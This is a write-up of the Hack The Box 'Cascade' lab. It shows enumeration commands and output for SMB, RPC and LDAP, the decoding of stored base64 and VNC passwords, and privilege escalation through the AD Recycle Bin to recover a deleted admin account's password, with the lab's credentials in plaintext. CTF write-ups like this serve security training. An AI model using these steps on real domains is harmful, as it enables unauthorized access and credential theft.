- Published on
Hack The Box - Cascade
Cascade is a Windows Medium box, which involves lot of enumeration and finding VNC credentials which can be decrypted and with that we need to find SQlite database and also a small Reverse Engineering. Really a fun box to try.
Link: https://www.hackthebox.eu/home/machines/profile/235
Let's Begin with our Initial Nmap Scan.
Nmap Scan Results
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-06-01 06:23:18Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%), Microsoft Windows Vista SP2 (91%), Microsoft Windows Vista SP2, Windows 7 SP1, or Windows Server 2008 (90%), Microsoft Windows 8.1 Update 1 (90%), Microsoft Windows Phone 7.5 or 8.0 (90%), Microsoft Windows 7 or Windows Server 2008 R2 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 4m03s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-06-01T06:24:23
|_ start_date: 2020-06-01T06:02:40
SMB Enumeration
Started with SMB and logged in without password and nothing here.
root@kali:~# smbclient -L 10.10.10.182
Enter WORKGROUP\root's password:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
SMB1 disabled -- no workgroup available
RPC Enumeration
Connected to it without any password.
I can get a list of users with enumdomusers
root@kali:~# rpcclient -U "" 10.10.10.182
Enter WORKGROUP\'s password:
rpcclient $> enumdomusers
user:[CascGuest] rid:[0x1f5]
user:[arksvc] rid:[0x452]
user:[s.smith] rid:[0x453]
user:[r.thompson] rid:[0x455]
user:[util] rid:[0x457]
user:[j.wakefield] rid:[0x45c]
user:[s.hickson] rid:[0x461]
user:[j.goodhand] rid:[0x462]
user:[a.turnbull] rid:[0x464]
user:[e.crowe] rid:[0x467]
user:[b.hanson] rid:[0x468]
user:[d.burman] rid:[0x469]
user:[BackupSvc] rid:[0x46a]
user:[j.allen] rid:[0x46e]
user:[i.croft] rid:[0x46f]
LDAP Enumeration
First I save the ldap result in a file. And looking at that shows a new thing called cascadeLegacyPwd, So I just checked if there is any other Pwd and its the only one.
root@kali:~/CTF/HTB/Boxes/Cascade# ldapsearch -h 10.10.10.182 -x -b "DC=cascade,DC=local" '(objectclass=Person)' > ldapresult
root@kali:~/CTF/HTB/Boxes/Cascade# cat ldapresult | grep Pwd
badPwdCount: 0
badPwdCount: 0
badPwdCount: 0
badPwdCount: 0
badPwdCount: 0
cascadeLegacyPwd: clk0bjVldmE=
badPwdCount: 0
badPwdCount: 0
badPwdCount: 0
badPwdCount: 0
badPwdCount: 0
badPwdCount: 0
badPwdCount: 0
badPwdCount: 0
badPwdCount: 0
badPwdCount: 0
badPwdCount: 0
So its for user r.thompson and it is base 64 encoded
root@kali:~/CTF/HTB/Boxes/Cascade# cat ldapresult | grep -B 25 cascadeLegacyPwd:
name: Ryan Thompson
objectGUID:: LfpD6qngUkupEy9bFXBBjA==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 132247339091081169
lastLogoff: 0
lastLogon: 132247339125713230
pwdLastSet: 132230718862636251
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFVQQAAA==
accountExpires: 9223372036854775807
logonCount: 2
sAMAccountName: r.thompson
sAMAccountType: 805306368
userPrincipalName: r.thompson@cascade.local
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200126183918.0Z
dSCorePropagationData: 20200119174753.0Z
dSCorePropagationData: 20200119174719.0Z
dSCorePropagationData: 20200119174508.0Z
dSCorePropagationData: 16010101000000.0Z
lastLogonTimestamp: 132294360317419816
msDS-SupportedEncryptionTypes: 0
cascadeLegacyPwd: clk0bjVldmE=
This might be the users password
root@kali:~/CTF/HTB/Boxes/Cascade# echo -n clk0bjVldmE= | base64 -d
rY4n5eva
So back to SMB, I tried login with r.thompson : rY4n5eva and I switched on the recursive mode and list all the files.
root@kali:~/CTF/HTB/Boxes/Cascade# smbclient -L 10.10.10.182 -U 'r.thompson'
Enter WORKGROUP\r.thompson's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
Audit$ Disk
C$ Disk Default share
Data Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
print$ Disk Printer Drivers
SYSVOL Disk Logon server share
SMB1 disabled -- no workgroup available
root@kali:~/CTF/HTB/Boxes/Cascade# smbclient //10.10.10.182/Data -U 'r.thompson'
Enter WORKGROUP\r.thompson's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Jan 27 08:57:34 2020
.. D 0 Mon Jan 27 08:57:34 2020
Contractors D 0 Mon Jan 13 07:15:11 2020
Finance D 0 Mon Jan 13 07:15:06 2020
IT D 0 Tue Jan 28 23:34:51 2020
Production D 0 Mon Jan 13 07:15:18 2020
Temps D 0 Mon Jan 13 07:15:15 2020
13106687 blocks of size 4096. 7793839 blocks available
smb: \> recurse on
smb: \> ls
. D 0 Mon Jan 27 08:57:34 2020
.. D 0 Mon Jan 27 08:57:34 2020
Contractors D 0 Mon Jan 13 07:15:11 2020
Finance D 0 Mon Jan 13 07:15:06 2020
IT D 0 Tue Jan 28 23:34:51 2020
Production D 0 Mon Jan 13 07:15:18 2020
Temps D 0 Mon Jan 13 07:15:15 2020
\Contractors
NT_STATUS_ACCESS_DENIED listing \Contractors\*
\Finance
NT_STATUS_ACCESS_DENIED listing \Finance\*
\IT
. D 0 Tue Jan 28 23:34:51 2020
.. D 0 Tue Jan 28 23:34:51 2020
Email Archives D 0 Tue Jan 28 23:30:30 2020
LogonAudit D 0 Tue Jan 28 23:34:40 2020
Logs D 0 Wed Jan 29 06:23:04 2020
Temp D 0 Wed Jan 29 03:36:59 2020
\Production
NT_STATUS_ACCESS_DENIED listing \Production\*
\Temps
NT_STATUS_ACCESS_DENIED listing \Temps\*
\IT\Email Archives
. D 0 Tue Jan 28 23:30:30 2020
.. D 0 Tue Jan 28 23:30:30 2020
Meeting_Notes_June_2018.html A 2522 Tue Jan 28 23:30:12 2020
\IT\LogonAudit
. D 0 Tue Jan 28 23:34:40 2020
.. D 0 Tue Jan 28 23:34:40 2020
\IT\Logs
. D 0 Wed Jan 29 06:23:04 2020
.. D 0 Wed Jan 29 06:23:04 2020
Ark AD Recycle Bin D 0 Fri Jan 10 22:03:45 2020
DCs D 0 Wed Jan 29 06:26:00 2020
\IT\Temp
. D 0 Wed Jan 29 03:36:59 2020
.. D 0 Wed Jan 29 03:36:59 2020
r.thompson D 0 Wed Jan 29 03:36:53 2020
s.smith D 0 Wed Jan 29 01:30:01 2020
\IT\Logs\Ark AD Recycle Bin
. D 0 Fri Jan 10 22:03:45 2020
.. D 0 Fri Jan 10 22:03:45 2020
ArkAdRecycleBin.log A 1303 Wed Jan 29 06:49:11 2020
\IT\Logs\DCs
. D 0 Wed Jan 29 06:26:00 2020
.. D 0 Wed Jan 29 06:26:00 2020
dcdiag.log A 5967 Fri Jan 10 21:47:30 2020
\IT\Temp\r.thompson
. D 0 Wed Jan 29 03:36:53 2020
.. D 0 Wed Jan 29 03:36:53 2020
\IT\Temp\s.smith
. D 0 Wed Jan 29 01:30:01 2020
.. D 0 Wed Jan 29 01:30:01 2020
VNC Install.reg A 2680 Wed Jan 29 00:57:44 2020
smb: \>
Some files seems interesting so downloaded them to my machine for further examine.
Meeting_Notes_June_2018.html
[p](p)-- New production network will be going live on
Wednesday so keep an eye out for any issues. [/p](/p)
[p](p)-- We will be using a temporary account to
perform all tasks related to the network migration and this account will be deleted at the end of
2018 once the migration is complete. This will allow us to identify actions
related to the migration in security logs etc. Username is TempAdmin (password is the same as the normal admin account password). [/p](/p)
[p](p)-- The winner of the �Best GPO� competition will be
announced on Friday so get your submissions in soon.[/p](/p)
[p class=MsoNormal](p class=MsoNormal)[o:p](o:p) [/o:p](/o:p)[/p](/p)
There is a thing to note here they use a TempAdmin to do some network migration and the password is as same for Admin account.
Getting User Shell
There is an interesting file in s.smith which is VNC Install.reg
root@kali:~/CTF/HTB/Boxes/Cascade# cat VNC\ Install.reg
��Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC]
[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server]
"ExtraPorts"=""
"QueryTimeout"=dword:0000001e
"QueryAcceptOnTimeout"=dword:00000000
"LocalInputPriorityTimeout"=dword:00000003
"LocalInputPriority"=dword:00000000
"BlockRemoteInput"=dword:00000000
"BlockLocalInput"=dword:00000000
"IpAccessControl"=""
"RfbPort"=dword:0000170c
"HttpPort"=dword:000016a8
"DisconnectAction"=dword:00000000
"AcceptRfbConnections"=dword:00000001
"UseVncAuthentication"=dword:00000001
"UseControlAuthentication"=dword:00000000
"RepeatControlAuthentication"=dword:00000000
"LoopbackOnly"=dword:00000000
"AcceptHttpConnections"=dword:00000001
"LogLevel"=dword:00000000
"EnableFileTransfers"=dword:00000001
"RemoveWallpaper"=dword:00000001
"UseD3D"=dword:00000001
"UseMirrorDriver"=dword:00000001
"EnableUrlParams"=dword:00000001
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
"AlwaysShared"=dword:00000000
"NeverShared"=dword:00000000
"DisconnectClients"=dword:00000001
"PollingInterval"=dword:000003e8
"AllowLoopback"=dword:00000000
"VideoRecognitionInterval"=dword:00000bb8
"GrabTransparentWindows"=dword:00000001
"SaveLogToAllUsersPath"=dword:00000000
"VideoClasses"=""
It contains encrypted password and I googled how to crack it and found this post
https://github.com/frizb/PasswordDecrypts
I used the hex we found inside the decrypt and It gives us the password.
I tried login evil-winrm with the credentials s.smith : sT333ve2
After some enumeration I decided to check SMB again with the new user
root@kali:~/CTF/HTB/Boxes/Cascade# smbclient -L 10.10.10.182 -U 's.smith'
Enter WORKGROUP\s.smith's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
Audit$ Disk
C$ Disk Default share
Data Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
print$ Disk Printer Drivers
SYSVOL Disk Logon server share
SMB1 disabled -- no workgroup available
root@kali:~/CTF/HTB/Boxes/Cascade# smbclient //10.10.10.182/Audit$ -U 's.smith'
Enter WORKGROUP\s.smith's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Jan 29 23:31:26 2020
.. D 0 Wed Jan 29 23:31:26 2020
CascAudit.exe A 13312 Wed Jan 29 03:16:51 2020
CascCrypto.dll A 12288 Wed Jan 29 23:30:20 2020
DB D 0 Wed Jan 29 03:10:59 2020
RunAudit.bat A 45 Wed Jan 29 04:59:47 2020
System.Data.SQLite.dll A 363520 Sun Oct 27 12:08:36 2019
System.Data.SQLite.EF6.dll A 186880 Sun Oct 27 12:08:38 2019
x64 D 0 Mon Jan 27 03:55:27 2020
x86 D 0 Mon Jan 27 03:55:27 2020
13106687 blocks of size 4096. 7793037 blocks available
smb: \> cd DB
smb: \DB\> ls
. D 0 Wed Jan 29 03:10:59 2020
.. D 0 Wed Jan 29 03:10:59 2020
Audit.db A 24576 Wed Jan 29 03:09:24 2020
13106687 blocks of size 4096. 7793295 blocks available
smb: \DB\> get Audit.db
getting file \DB\Audit.db of size 24576 as Audit.db (20.3 KiloBytes/sec) (average 20.3 KiloBytes/sec)
smb: \DB\>
There is a database file downloaded to my machine.
I Dump them all
There is an user ArkSvc and a encrypted password and its not Base64. So our next choice is RE CascAudit.exe
I tried login with evil-winrm with new credentials we found ArkSvc : w3lc0meFr31nd
Privilege Escalation
Checking about user arksvc, shows he is the group of AD Recycle Bin
*Evil-WinRM* PS C:\> net user arksvc
User name arksvc
Full Name ArkSvc
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never
Password last set 1/9/2020 5:18:20 PM
Password expires Never
Password changeable 1/9/2020 5:18:20 PM
Password required Yes
User may change password No
Workstations allowed All
Logon script
User profile
Home directory
Last logon 3/30/2020 12:37:25 PM
Logon hours allowed All
Local Group Memberships *AD Recycle Bin *IT
*Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.
The Active Directory Recycle Bin was introduced in the Windows Server 2008 R2 release. The goal of this feature was to facilitate the recovery of deleted Active Directory objects without requiring restoration of backups, restarting Active Directory Domain Services, or rebooting domain controllers.
After some googling, Since we are in AD Recycle Bin group, I found this command and it retrieve the deleted stuffs.
*Evil-WinRM* PS C:\Users\arksvc\Documents> Get-ADObject -filter 'isdeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects -property *
.
.
.
.
.
.
Name : User
DEL:746385f2-e3a0-4252-b83a-5a206da0ed88
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory :
ObjectClass : container
ObjectGUID : 746385f2-e3a0-4252-b83a-5a206da0ed88
ProtectedFromAccidentalDeletion : False
sDRightsEffective : 0
showInAdvancedViewOnly : True
uSNChanged : 196700
uSNCreated : 196690
whenChanged : 1/26/2020 2:40:52 AM
whenCreated : 1/26/2020 2:34:31 AM
accountExpires : 9223372036854775807
badPasswordTime : 0
badPwdCount : 0
CanonicalName : cascade.local/Deleted Objects/TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
cascadeLegacyPwd : YmFDVDNyMWFOMDBkbGVz
CN : TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
codePage : 0
countryCode : 0
Created : 1/27/2020 3:23:08 AM
createTimeStamp : 1/27/2020 3:23:08 AM
Deleted : True
Description :
Here we get TempAdmin password we know both Admin and TempAdmin password is same.
We know its base64 encrypted so encoding it gives me that password.
root@kali:~/CTF/HTB/Boxes/Cascade# echo -n YmFDVDNyMWFOMDBkbGVz | base64 -d
baCT3r1aN00dles
We own the System